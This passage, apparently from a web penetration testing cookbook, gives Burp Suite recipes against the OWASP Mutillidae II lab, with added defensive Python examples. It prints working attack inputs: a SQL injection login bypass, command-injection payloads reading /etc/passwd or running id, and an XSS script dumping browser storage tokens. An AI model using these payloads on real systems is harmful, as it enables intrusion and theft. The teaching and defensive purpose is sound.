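    """Middleware: lets only the allowlisted verbs reach the application.
    Known-but-disallowed verbs get 405 plus an Allow header, so the policy is
    what answers, not the application; verbs the server does not implement at
    all (TRACK, the WebDAV verbs) get 501."""
    def wrapped(environ, start_response):
        method = environ.get("REQUEST_METHOD", "").upper()
        if method in allowed:
            return app(environ, start_response)
        headers = [("Allow", ", ".join(allowed)), ("Content-Type", "text/plain")]
        if method in KNOWN_METHODS:
            start_response("405 Method Not Allowed", headers)
        else:
            start_response("501 Not Implemented", headers)
        return [b""]
    return wrapped


def probe(app, method, path="/mutillidae/index.php"):
    """Sends one request into the WSGI app offline and returns (status line,
    headers, body); the status line is what the Intruder table shows per verb."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status
        captured["headers"] = dict(headers)

    body = b"".join(app({"REQUEST_METHOD": method, "PATH_INFO": path}, start_response))
    return captured["status"], captured["headers"], body


def verb_report(app, verbs=PROBED_VERBS):
    """Maps each probed verb to its numeric status code, mirroring the recipe's
    check that no unexpected verb comes back with 200."""
    return {verb: int(probe(app, verb)[0].split()[0]) for verb in verbs}
```

Run against the bare app every verb reports 200; behind the middleware only 
HEAD and POST do, and the Allow header tells a tester exactly which verbs the 
resource supports. In production the same policy belongs in the web server 
or framework configuration rather than in application code, and TRACE should 
be disabled there as well. 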


Testing for HTTP Parameter Pollution 


HTTP Parameter Pollution (HPP) is an attack in which multiple HTTP 
parameters are sent to the web server with the same name. The intention is to 
determine whether the application responds in an unanticipated manner, allowing 
exploitation. For example, in a GET request, additional parameters can be added 
to the query string—in this fashion: “&name=value”—where name is a duplicate 
parameter name already known by the application code. Likewise, HPP attacks 
can be performed on POST requests by duplicating a parameter name in the 
POST body data. 


Getting ready 


Using OWASP Mutillidae II, let's determine whether the application allows HPP 
attacks. 


How to do it... 


1. From the OWASP Mutillidae II menu, select Login by navigating to OWASP 
2013 | A1 - Injection (Other) | HTTP Parameter Pollution | Poll Question: 


[Screenshot: the OWASP Mutillidae II menu, navigating OWASP 2013 | A1 - 
Injection (Other) | HTTP Parameter Pollution | Poll Question.] 


2. Select a tool from one of the radio buttons, add your initials, and click the 
Submit Vote button: 


[Screenshot: the User Poll page, "Choose Your Favorite Security Tool", with 
radio buttons for nmap, wireshark, tcpdump, netcat, metasploit, kismet, Cain, 
Ettercap, Paros, Burp Suite, Sysinternals and inSIDDer, a Your Initials box 
(SW) and the Submit Vote button.] 


3. Switch to the Burp Proxy | HTTP history tab, and find the request you just 
performed from the User Poll page. Note the parameter named choice. The 
value of this parameter is Nmap. Right-click and send this request to 
Repeater: 


[Screenshot: Proxy | HTTP history with the poll request selected and the 
right-click menu open (Send to Spider, Do an active scan, Do a passive scan, 
Send to Intruder, ...). The request, OCR noise removed:] 

GET /mutillidae/index.php?page=user-poll.php&csrf-token=&choice=nmap&initials=SW&user-poll-php-submit-button=Submit+Vote HTTP/1.1 
Host: 192.168.56.101 


4. Switch to the Burp Repeater and add another parameter with the same name 
to the query string. Let's pick another tool from the User Poll list and 
append it to the query string, for example, “&choice=tcpdump”. Click Go to 
send the request: 


[Screenshot: the request in Repeater with the duplicate parameter appended. 
The request line, OCR noise removed:] 

GET /mutillidae/index.php?page=user-poll.php&csrf-token=&choice=nmap&initials=SW&choice=tcpdump&user-poll-php-submit-button=Submit+Vote HTTP/1.1 
Host: 192.168.56.101 


5. Examine the response. Which choice did the application code accept? This 
is easy to find by searching for the Your choice was string. Clearly, the 
duplicate choice parameter value is the one the application code accepted to 
count in the User Poll vote: 


[Screenshot: the Repeater response (HTML), searched for "Your choice was"; 
the page reports the duplicate choice value, tcpdump, as the vote counted.] 


How it works... 


The application code fails to check against multiple parameters with the same 
name when passed into a function. The result is that the application usually acts 
upon the last parameter match provided. This can result in odd behavior and 
unexpected results. 
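
Strict parameter handling of the kind that closes this gap, as an added 
example that is not the book's or Mutillidae's code. The standard library's 
parse_qs keeps every occurrence of a name, so a duplicate can be detected and 
refused instead of silently taking the first or the last value; the query 
string is reconstructed from the recipe's polluted request, and the function 
names are hypothetical. 

```python
"""Added example, not from the book: strict query-string handling that closes
the HTTP Parameter Pollution gap the recipe demonstrates. parse_qs keeps every
occurrence of a name, so duplicates can be detected rather than resolved by
whichever order the framework happens to use."""
from urllib.parse import parse_qs

# Constructed from the recipe: the original choice plus the appended duplicate.
POLLUTED_QUERY = ("page=user-poll.php&csrf-token=&choice=nmap&initials=SW"
                  "&choice=tcpdump&user-poll-php-submit-button=Submit+Vote")
CLEAN_QUERY = "page=user-poll.php&csrf-token=&choice=nmap&initials=SW"


def find_duplicate_params(query):
    """Returns {name: [values...]} for every parameter sent more than once;
    an empty dict means the request is free of pollution."""
    parsed = parse_qs(query, keep_blank_values=True)
    return {name: values for name, values in parsed.items() if len(values) > 1}


def lenient_last_wins(query):
    """Models a loose parser in which the last occurrence overwrites earlier
    ones, which matches what the recipe observes: tcpdump, not nmap, is
    counted. Other parsers take the first value or join both, so the outcome
    depends on the stack and is never something the application chose."""
    result = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        result[name] = value
    return result


def strict_single_valued(query, expected):
    """Accepts the request only if every expected parameter appears exactly
    once; a duplicate is treated as a malformed request, not as a choice."""
    parsed = parse_qs(query, keep_blank_values=True)
    clean = {}
    for name in expected:
        values = parsed.get(name, [])
        if len(values) != 1:
            raise ValueError(f"parameter {name!r} must appear exactly once, got {len(values)}")
        clean[name] = values[0]
    return clean


def is_clean_request(query, expected):
    """Convenience wrapper for callers that only need a yes/no answer."""
    try:
        strict_single_valued(query, expected)
        return True
    except ValueError:
        return False
```

Logging the output of find_duplicate_params for every request is also a cheap 
detection: legitimate forms do not send the same field twice, so a duplicate 
of a security-relevant name such as choice, initials or a token is a signal 
worth alerting on. 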


Testing for SQL injection 


A SQL injection attack involves an attacker providing input to the database, 
which is received and used without any validation or sanitization. The result is 
divulging sensitive data, modifying data, or even bypassing authentication 
mechanisms. 


Getting ready 


Using the OWASP Mutillidae II Login page, let's determine whether the 
application is vulnerable to SQL injection (SQLi) attacks. 


How to do it... 


1. From the OWASP Mutillidae II menu, select Login by navigating to OWASP 
2013 | A1 - Injection (SQL) | SQLi - Bypass Authentication | Login: 


[Screenshot: the OWASP Mutillidae II menu, navigating OWASP 2013 | A1 - 
Injection (SQL) | SQLi - Bypass Authentication | Login.] 


2. At the Login screen, place invalid credentials into the username and 
password text boxes. For example, username is tester and password 
is tester. Before clicking the Login button, let's turn on Proxy | 
Interceptor. 

3. Switch to the Burp Proxy | Intercept tab. Turn the Interceptor on by toggling 
to Intercept is on. 


4. While Proxy | Interceptor has the request paused, insert the new payload of 
' or 1=1--<space> within the username parameter and click the Login 
button: 


[Screenshot: Burp Proxy | Intercept tab, Intercept is on, showing the paused request to http://192.168.56.101:80] 

POST /mutillidae/index.php?page=login.php HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/mutillidae/index.php?page=login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Cookie: showhints=1; PHPSESSID=dl174Sborno0Svn4jnjv4m$les2; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close
Upgrade-Insecure-Requests: 1

username=tester&password=tester&login-php-submit-button=Login


5. Click the Forward button. Turn Interceptor off by toggling to Intercept is 
off. 


6. Return to the Firefox browser and note you are now logged in as admin! 


How it works... 


The tester account did not exist in the database; however, the ' or 1=1-- 
<space> payload resulted in bypassing the authentication mechanism because the 
SQL code constructed the query based on unsanitized user input. The account of 
admin is the first account created in the database, so the database defaulted to 
that account. 
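The following added Python example, which is not the book's or Mutillidae's code, reproduces the mechanism against a small in-memory SQLite table: the concatenated query accepts the recipe's payload and returns the first row (admin), while the same login written with bound parameters rejects it. The table rows and password values are constructed sample data.

```python
import sqlite3


def make_accounts_db():
    """In-memory accounts table with constructed rows. admin is inserted first,
    which is why the bypass in the recipe lands on that account. Passwords are
    stored in clear only to keep the example short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO accounts (username, password) VALUES (?, ?)",
        [("admin", "adminpass"), ("adrian", "somepassword"), ("john", "monkey")],
    )
    return conn


def build_vulnerable_query(username, password):
    """String concatenation: the submitted text becomes part of the SQL, so a
    quote and a comment marker in the username rewrite the WHERE clause and
    comment out the password check. Exposed so a reviewer can see exactly
    what the database received."""
    return ("SELECT username FROM accounts WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn, username, password):
    """Authenticate with the concatenated query; returns the matched username or None."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_parameterised(conn, username, password):
    """Bound parameters: the query text is fixed and the values travel
    separately, so the same payload is compared literally against the
    username column and matches nothing."""
    sql = "SELECT username FROM accounts WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


BYPASS_PAYLOAD = "' or 1=1-- "   # the payload from the recipe, trailing space included

if __name__ == "__main__":
    db = make_accounts_db()
    print(build_vulnerable_query(BYPASS_PAYLOAD, "tester"))
    print("vulnerable   :", login_vulnerable(db, BYPASS_PAYLOAD, "tester"))    # admin
    print("parameterised:", login_parameterised(db, BYPASS_PAYLOAD, "tester"))  # None
```

The printed query makes the "There's more" point visible: everything after the two dashes, including the password comparison, is a comment to the database, and the remaining condition is true for every row.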


There's more... 


We used a SQLi wordlist from wfuzz within Burp Intruder to test many different 
payloads within the same username field. Examine the response for each attack 
in the results table to determine whether the payload successfully performed a 
SQL injection. 


The construction of SQL injection payloads requires some knowledge of the 
backend database and the particular syntax required. 


Testing for command injection 


Command injection involves an attacker attempting to invoke a system 
command, normally performed at a terminal session, within an HTTP request 
instead. Many web applications allow system commands through the UI for 
troubleshooting purposes. A web-penetration tester must test whether the web 
page allows further commands on the system that should normally be restricted. 


Getting ready 


For this recipe, you will need the SecLists Payload for Unix commands: 


• SecLists-master | Fuzzing | FUZZDB_UnixAttacks.txt 


  ◦ Download from GitHub: https://github.com/danielmiessler/SecLists 


Using the OWASP Mutillidae II DNS Lookup page, let's determine whether the 
application is vulnerable to command injection attacks. 


How to do it... 


1. From the OWASP Mutillidae II menu, select DNS Lookup by navigating to 
OWASP 2013 | A1 - Injection (Other) | Command Injection | DNS Lookup: 


[Screenshot: OWASP Mutillidae II menu bar (Home, Login/Register, Toggle Hints, Show Popup Hints, Toggle Security, Enforce SSL, Reset DB, View Log, View Captured Data) with the path to DNS Lookup selected] 

2. On the DNS Lookup page, type the IP address 127.0.0.1 in the text box 
and click the Lookup DNS button: 


[Screenshot: DNS Lookup page (Back, Help Me!, Hints, Switch to SOAP Web Service Version of this Page): "Who would you like to do a DNS lookup on?" Enter IP or hostname; Hostname/IP: 127.0.0.1; Lookup DNS button] 


3. Switch to the Burp Proxy | HTTP history tab and look for the request you 
just performed. Right-click on Send to Intruder: 


[Screenshot: Burp Proxy | HTTP history tab (Logging of out-of-scope Proxy traffic is disabled; Filter: Hiding CSS, image and general binary content) with the DNS Lookup request selected and the right-click menu open, showing entries such as Send to Spider, Do a passive scan, Send to Intruder, Send to Repeater (Ctrl+R) and Send to Sequencer] 

POST /mutillidae/index.php?page=dns-lookup.php HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/mutillidae/index.php?page=dns-lookup.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Cookie: showhints=1; username=admin; uid=1; PHPSESSID=d174Sborno0Svn4jnjv4mSlcs2; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close
Upgrade-Insecure-Requests: 1

target_host=127.0.0.1&dns-lookup-php-submit-button=Lookup+DNS


4. In the Intruder | Positions tab, clear all suggested payload markers with the 
Clear $ button. In the target_host parameter, place a pipe symbol (|) 
immediately following the 127.0.0.1 IP address. After the pipe symbol, 
place an x. Highlight the x and click the Add $ button to wrap the x with 
payload markers: 


[Screenshot: Intruder | Positions tab, Attack type: Sniper ("Configure the positions where payloads will be inserted into the base request. The attack type determines the way in which payloads are assigned to payload positions - see help for full details."). The base request is the DNS Lookup POST from the previous step; after clearing the automatic markers (Clear §) and adding one around the x (Add §), the body reads:] 

target_host=127.0.0.1|§x§&dns-lookup-php-submit-button=Lookup+DNS


5. In the Intruder | Payloads tab, click the Load button. Browse to the location 
where you downloaded the SecLists-master wordlists from GitHub. 
Navigate to the location of the FUZZDB_UnixAttacks.txt wordlist and use 
the following to populate the Payload Options [Simple list] box: SecLists- 
master |Fuzzing | FUZZDB_UnixAttacks.txt 


[Screenshot: Intruder | Payloads tab, Payload Options [Simple list] ("This payload type lets you configure a simple list of strings that are used as payloads."), loaded from FUZZDB_UnixAttacks.txt; the list begins with entries such as %00, %00/etc/passwd%00 and %0A/usr/bin/id%0A] 


6. Uncheck the Payload Encoding box at the bottom of the Payloads tab page 
and then click the Start Attack button. 

7. Allow the attack to continue until you reach payload 50. Notice the 
responses through the Render tab around payload 45 or so. We are able to 
perform commands, such as id, on the operating system, which displays the 
results of the commands on the web page: 


[Screenshot: Intruder attack results window, Filter: Showing all items] 

Request  Payload                      Status  Error  Timeout  Length 
42       %00/etc/passwd%00            200                     48730 
43       %01%02%03%04%0a%0d%0aADSF    200                     48728 
44       %08x                         200                     48719 
         %0A/usr/bin/id%0A            200                     48784 
47       %0Aid                        200                     48774 
48       %0AID%0A                     200                     48775 

[Render tab: the DNS Lookup page ("Who would you like to do a DNS lookup on?", Enter IP or hostname, Hostname/IP) with the output of the injected command displayed in the response] 


How it works... 


Failure to define and validate user input against an acceptable list of system 
commands can lead to command injection vulnerabilities. In this case, the 
application code does not confine system commands available through the UI, 
allowing visibility and execution of commands on the operating system that 
should be restricted. 
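As an added example (not from the book, Mutillidae or SecLists), this Python code shows the missing check from the defender's side: the lookup target is accepted only when it parses as an IP address or a well-formed hostname, the external command is started as an argument list with no shell, and the same validator is reused to flag Intruder-style payloads in a constructed list of target_host values. The nslookup command name is an assumption about how the lookup is performed.

```python
import ipaddress
import re
import subprocess
from urllib.parse import unquote_plus

# One DNS label: 1-63 letters, digits and hyphens, no leading or trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")
# Characters that mean something to a shell; the %0A and %00 entries of the
# wordlist decode to the newline and NUL characters listed here.
_SHELL_META = set("|;&$`<>(){}\"'\\\n\r\x00 \t")


class InvalidLookupTarget(ValueError):
    """Input is neither an IP address nor a syntactically valid hostname."""


def validate_target(value):
    """Positive validation: return the target only if it is a literal IP address
    or a hostname made of valid labels. Everything else is rejected before any
    command line is assembled, which is the check the recipe shows missing."""
    if not value or len(value) > 253:
        raise InvalidLookupTarget("empty or too long")
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if any(ch in _SHELL_META for ch in value):
        raise InvalidLookupTarget("shell metacharacter in target")
    if not all(_LABEL.match(label) for label in value.rstrip(".").split(".")):
        raise InvalidLookupTarget("not a valid hostname")
    return value


def build_lookup_argv(target):
    """argv for the lookup (command name assumed). Passing a list with
    shell=False means the target is delivered as one argument and is never
    interpreted as shell syntax, so a pipe or newline cannot start a command."""
    return ["nslookup", validate_target(target)]


def dns_lookup(target):
    """Run the lookup without a shell. Not exercised offline."""
    result = subprocess.run(build_lookup_argv(target), capture_output=True,
                            text=True, timeout=10)
    return result.stdout


def flag_injection_attempts(raw_values):
    """Detection side: given URL-encoded target_host values as a web server or
    WAF would see them, return the ones that fail validation."""
    flagged = []
    for raw in raw_values:
        try:
            validate_target(unquote_plus(raw))
        except InvalidLookupTarget:
            flagged.append(raw)
    return flagged


# Constructed sample: legitimate lookups mixed with payloads of the kind seen
# in the Intruder results above.
SAMPLE_TARGETS = [
    "127.0.0.1",
    "www.example.com",
    "127.0.0.1|%0Aid",
    "%0A/usr/bin/id%0A",
    "%00/etc/passwd%00",
    "127.0.0.1;id",
]

if __name__ == "__main__":
    print(build_lookup_argv("127.0.0.1"))
    print(flag_injection_attempts(SAMPLE_TARGETS))
```

The validator is deliberately an allowlist: it describes what a lookup target may look like rather than enumerating bad characters, and the metacharacter set only adds a clearer error message for the most common cases.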


Attacking the Client 


In this chapter, we will cover the following recipes: 


• Testing for Clickjacking 
• Testing for DOM-based cross-site scripting 
• Testing for JavaScript execution 
• Testing for HTML injection 
• Testing for client-side resource manipulation 


Introduction 


Code available on the client that is executed in the browser requires testing to 
determine any presence of sensitive information or the allowance of user input 
without server-side validation. Learn how to perform these tests using Burp. 


Software tool requirements 


To complete the recipes in this chapter, you will need the following: 


• OWASP Broken Web Applications (VM) 
• OWASP Mutillidae link 
• Burp Proxy Community or Professional (https://portswigger.net/burp/) 


Testing for Clickjacking 


Clickjacking is also known as the UI redress attack. This attack is a deceptive 
technique that tricks a user into interacting with a transparent iframe and, 
potentially, sending unauthorized commands or sensitive information to an attacker- 
controlled website. Let's see how to use the Burp Clickbandit to test whether a 
site is vulnerable to Clickjacking. 


Getting ready 


Using the OWASP Mutillidae II application and the Burp Clickbandit, let's 
determine whether the application protects against Clickjacking attacks. 


How to do it... 


1. Navigate to the Home page of the OWASP Mutillidae II. 
2. Switch to Burp, and from the top-level menu, select Burp Clickbandit: 


[Screenshot: Burp top-level menu (Burp, Intruder, Repeater, Window, Help) with the Burp menu open: Save copy of project, Import project [disk projects only], Rename project, Project options, User options, Passwords, Burp Infiltrator, Burp Clickbandit, Burp Collaborator client, Save legacy state file, Restore legacy state file, Exit] 


3. A pop-up box explains the tool. Click the button entitled Copy Clickbandit 
to clipboard: 


[Dialog: Burp Clickbandit] 

Burp Clickbandit is a tool for generating clickjacking attacks. When you have found a web page that may be vulnerable to clickjacking, you can use Burp Clickbandit to create an attack, and confirm that the vulnerability can be successfully exploited. 

Burp Clickbandit runs in your browser using JavaScript. It works on all modern browsers except for Microsoft IE and Edge. To run Burp Clickbandit, use the following steps: 

1. Click the "Copy Clickbandit to clipboard" button below. This will copy the Clickbandit script to your clipboard. 
2. In your browser, visit the web page that you want to test, in the usual way. 
3. In your browser, open the web developer console. This might also be called "developer tools" or "JavaScript console". 
4. Paste the Clickbandit script into the web developer console, and press enter. 

See the documentation for more details on using Burp Clickbandit. 

Note: Exercise caution when running Burp Clickbandit on untrusted websites. Malicious JavaScript from the target site can subvert the HTML output that is generated by Burp Clickbandit. 

[Dialog buttons, including Copy Clickbandit to clipboard] 


4. Return to the Firefox browser, and press F12 to bring up the developer 
tools. From the developer tools menu, select Console, and look for the 
prompt at the bottom: 


[Screenshot: Firefox developer tools (Inspector, Console, Debugger, Style Editor, Performance, Memory, Network, Storage, DOM) docked under the Mutillidae page with the Console tab selected; the console shows a warning that the character encoding of the HTML document was not declared, and the input prompt is at the bottom] 


5. At the Console prompt (for example, >>), paste into the prompt the 
Clickbandit script you copied to your clipboard: 


[Screenshot: Firefox on the OWASP Mutillidae II home page (Version: 2.6.24, Security Level: 0 (Hosed), Hints: Enabled, Not Logged In) with the developer tools Console open. The console shows the warning "The character encoding of the HTML document was not declared. The document will render with garbled text in some browser configurations if the document contains characters from outside the US-ASCII range. The character encoding of the page must be declared in the document or in the transfer protocol." and, pasted at the prompt, the Burp Clickbandit script, which begins with the comment "Copyright PortSwigger Ltd. All rights reserved. Usage is subject to the Burp Suite license terms. See https://portswigger.net for more details." followed by the !function(){ ... } body that builds the click traps (addClickTrap, addMessage, generatePoc)] 


6. After pasting in the script into the prompt, press the Enter key. You should 
see the Burp Clickbandit Record mode. Click the Start button to begin: 


[Screenshot: Firefox at 192.168.56.101/mutillidae/index.php?page=home.php showing the BURP CLICKBANDIT banner in Record mode, with the controls Sandbox iframe?, Disable click actions and Start] 


7. Start clicking around on the application after it appears. Click available 
links at the top Mutillidae menu, click available links on the side menu, or 
browse to pages within Mutillidae. Once you've clicked around, press the 
Finish button on the Burp Clickbandit menu. 

8. You should notice big red blocks appear transparently on top of the 
Mutillidae web pages. Each red block indicates a place where a malicious 
iframe can appear. Feel free to click each red block to see the next red block 
appear, and so on: 


[Screenshot: the BURP CLICKBANDIT overlay on the Mutillidae home page (Web Pwn in Mass Production, Hints: Enabled, Not Logged In) after pressing Finish, with the red click-trap blocks drawn over the page] 


9. Once you wish to stop and save your results, click the Save button. This 
will save the Clickjacking PoC in an HTML file for you to place inside your 
penetration test report. 


How it works... 


Since the Mutillidae application does not make use of the X-FRAME-OPTIONS 
header set to DENY, it is possible to inject a malicious iframe into the Mutillidae 
web pages. The Clickbandit increases the opacity of the iframe for 
visibility and creates a proof of concept (PoC) to illustrate how the vulnerability 
can be exploited. 
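To check for this protection from the response headers rather than by clicking through the Clickbandit, here is an added Python example (not Burp or Clickbandit code) that decides whether a given origin may frame a page from its X-Frame-Options and Content-Security-Policy frame-ancestors headers, following the precedence browsers apply. The header sets and framing origins in the usage are constructed; only the Mutillidae URL comes from the recipe.

```python
from urllib.parse import urlsplit

_DEFAULT_PORTS = {"http": 80, "https": 443}


def origin_of(url):
    """(scheme, host, port) with the default port filled in, so that
    http://a.example and http://a.example:80 compare equal."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    return scheme, (parts.hostname or "").lower(), parts.port or _DEFAULT_PORTS.get(scheme)


def parse_csp(value):
    """Split a Content-Security-Policy header into {directive: [source expressions]}."""
    policy = {}
    for directive in value.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def frame_ancestors_allow(sources, page_url, framer_url):
    """Evaluate a frame-ancestors source list against the origin that wants to
    embed the page. Handles 'none', 'self', *, scheme sources (https:) and host
    sources with an optional scheme, port and leading *. wildcard."""
    page = origin_of(page_url)
    fr_scheme, fr_host, fr_port = origin_of(framer_url)
    for src in sources:
        s = src.lower()
        if s == "'none'":
            return False
        if s == "*":
            return True
        if s == "'self'":
            if (fr_scheme, fr_host, fr_port) == page:
                return True
            continue
        if s.endswith(":") and "/" not in s:            # scheme source, e.g. https:
            if fr_scheme == s[:-1]:
                return True
            continue
        parts = urlsplit(s if "://" in s else "//" + s)  # host source
        if parts.scheme and parts.scheme != fr_scheme:
            continue
        if parts.port and parts.port != fr_port:
            continue
        host = parts.hostname or ""
        if host.startswith("*."):
            if fr_host.endswith(host[1:]):
                return True
        elif host == fr_host:
            return True
    return False


def framing_verdict(headers, page_url, framer_url):
    """Return (allowed, reason). CSP frame-ancestors takes precedence over
    X-Frame-Options when both are present, as browsers do. An X-Frame-Options
    value other than DENY or SAMEORIGIN (ALLOW-FROM is obsolete) is treated
    as giving no protection."""
    lowered = {name.lower(): value for name, value in headers.items()}
    csp = lowered.get("content-security-policy", "")
    policy = parse_csp(csp) if csp else {}
    if "frame-ancestors" in policy:
        sources = policy["frame-ancestors"]
        allowed = frame_ancestors_allow(sources, page_url, framer_url)
        return allowed, "CSP frame-ancestors " + " ".join(sources)
    xfo = lowered.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False, "X-Frame-Options: DENY"
    if xfo == "SAMEORIGIN":
        return origin_of(page_url) == origin_of(framer_url), "X-Frame-Options: SAMEORIGIN"
    if xfo:
        return True, "X-Frame-Options value not enforced by modern browsers: " + xfo
    return True, "no framing protection header"


# Constructed usage: the Mutillidae home page (no protective headers in the
# recipe) framed from an unrelated origin.
PAGE = "http://192.168.56.101/mutillidae/index.php?page=home.php"

if __name__ == "__main__":
    print(framing_verdict({}, PAGE, "http://attacker.example/"))
    print(framing_verdict({"X-Frame-Options": "DENY"}, PAGE, "http://attacker.example/"))
```

Applied to the Mutillidae response, the verdict is "allowed, no framing protection header", which is the condition the Clickbandit PoC demonstrates; the fix is either X-Frame-Options: DENY or a frame-ancestors directive naming the origins that legitimately embed the page.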


Testing for DOM-based cross-site 
scripting 


The Document Object Model (DOM) is a tree-like structural representation of 
all HTML web pages captured in a browser. Developers use the DOM to store 
information inside the browser for convenience. As a web penetration tester, it is 
important to determine the presence of DOM-based cross-site scripting (XSS) 
vulnerabilities. 


Getting ready 


Using the OWASP Mutillidae II HTML5 web storage exercise, let's determine 
whether the application is susceptible to DOM-based XSS attacks. 


How to do it... 


1. Navigate to OWASP 2013 | HTML5 Web Storage | HTML 5 Storage: 


[Screenshot: OWASP Mutillidae II menu (Version: 2.6.24, Security Level: 0 (Hosed), Hints: Enabled) with the path OWASP 2013 | HTML 5 Web Storage | HTML 5 Storage selected] 


2. Note the name/value pairs stored in the DOM using HTML5 Web Storage 
locations. Web storage includes Session and Local variables. Developers 
use these storage locations to conveniently store information inside a user's 
browser: 


[Screenshot: HTML 5 Storage page (Back, Help Me!, Hints) listing the HTML 5 Web Storage entries, with radio buttons for Session Storage, Local Storage and All Storage] 

Key                  Value                               Storage 
LocalStorageTarget   This is set by the index.php page   Local 
MessageOfTheDay      Go Cats!                            Local 


3. Switch to the Burp Proxy Intercept tab. Turn Interceptor on with the button 
Intercept is on. 

4. Reload the HTML 5 Web Storage page in Firefox browser by pressing F5 
or clicking the reload button. 


5. Switch to the Burp Proxy HTTP history tab. Find the paused request created 
by the reload you just performed. Note that the User-Agent string is 
highlighted, as shown in the following screenshot: 


[Screenshot: Burp Proxy | Intercept tab, Intercept is on, request to http://192.168.56.101:80 with the User-Agent header highlighted] 

GET /mutillidae/index.php?page=html5-storage.php HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/mutillidae/index.php?page=password-generator.php&username=anonymous
Cookie: showhints=1; PHPSESSID=9jsmn17vsn0mfe70ffv3vclkv1; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


6. Replace the preceding highlighted User-Agent with the following script: 


<script>try{var m = "";var l = window.localStorage; var s = 
window.sessionStorage; for(i=0;i<l.length;i++){var lKey = 
l.key(i);m += lKey + "=" + l.getItem(lKey) + 
";\n";};for(i=0;i<s.length;i++){var lKey = s.key(i);m += lKey 
+ "=" + s.getItem(lKey) + ";\n";};alert(m);}catch(e) 
{alert(e.message);}</script> 


7. Click the Forward button. Now, turn Interceptor off by clicking the toggle 
button to Intercept is off. 
8. Note the alert popup showing the contents of the DOM storage: 


LocalStorageTarget=This is set by the index.php page; 
MessageOfTheDay=Go Cats!; 
Secure.CurrentStateofHTML5Storage=Completely Insecure; 
Secure.IsUserLoggedIn?=No; 
Secure.AuthenticationToken=DU837HHFYTEYUE9S1934; 
SessionStorageTarget=This is set by the index.php page; 
AuthorizationLevel=0; 


How it works... 


The injected script illustrates how the presence of a cross-site scripting 
vulnerability combined with sensitive information stored in the DOM can allow 
an attacker to steal sensitive data. 


Testing for JavaScript execution 


JavaScript injection is a subtype of cross-site scripting attacks specific to the 
arbitrary injection of JavaScript. Vulnerabilities in this area can affect sensitive 
information held in the browser, such as user session cookies, or it can lead to 
the modification of page content, allowing script execution from attacker- 
controlled sites. 


Getting ready 


Using the OWASP Mutillidae II Password Generator exercise, let’s determine 
whether the application is susceptible to JavaScript XSS attacks. 


How to do it... 


1. Navigate to OWASP 2013 | A1 — Injection (Other) | JavaScript Injection | 
Password Generator: 


[Screenshot: OWASP Mutillidae II menu (Version: 2.6.24, Security Level: 0 (Hosed), Hints: Enabled, Not Logged In) with the path OWASP 2013 | A1 - Injection (Other) | JavaScript Injection | Password Generator selected. The A1 - Injection (Other) submenu also lists HTML Injection (HTMLi), HTMLi via HTTP Headers, HTMLi Via DOM Injection, HTMLi Via Cookie Injection, Frame Source Injection, Command Injection, JavaScript Injection (Those "Back" Buttons, Password Generator) and HTTP Parameter Pollution] 


2. Note after clicking the Generate Password button, a password is shown. 
Also, note the username value provided in the URL is reflected back as 
is on the web page: http://192.168.56.101/mutillidae/index.php?page=password-generator.php&username=anonymous. This means a 
potential XSS vulnerability may exist on the page: 


[Screenshot: Password Generator page (Back, Help Me!, Hints): "Making strong passwords is important. Click the button below to generate a password." "This password is for anonymous" Password: P6/H%q8xOvQ6gh* (Generate Password button)] 


3. Switch to the Burp Proxy HTTP history tab and find the HTTP message 
associated with the Password Generator page. Flip to the Response tab in 
the message editor, and perform a search on the string catch. Note that the 
JavaScript returned has a catch block where error messages display to the 
user. We will use this position for the placement of a carefully crafted 
JavaScript injection attack: 


[Screenshot: Burp Proxy | HTTP history tab (Logging of out-of-scope Proxy traffic is disabled; Filter: Hiding CSS, image and general binary content), Response | Raw view of the Password Generator page, searched for the string catch] 

</script>

<script>
    function onSubmitOfGeneratorForm(/*HTMLFormElement*/ theForm){
        try{
            var lPasswordText = "";
            var lPasswordCharset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789..."; /* remainder of the character set not legible in the capture */

            for( var i=0; i < 15; i++ ){
                lPasswordText += lPasswordCharset.charAt(Math.floor(Math.random() * lPasswordCharset.length));
            }// end for i

            document.getElementById("idPasswordInput").innerHTML = "Password: <span style=\"color: red; border-width: 1px;border-color:black;\">" + [line truncated in the capture]
            "</span>";

            document.getElementById("idPasswordTableRow").style.display = "";
            return false;

        }catch(e){
            alert("Error: " + e.message);
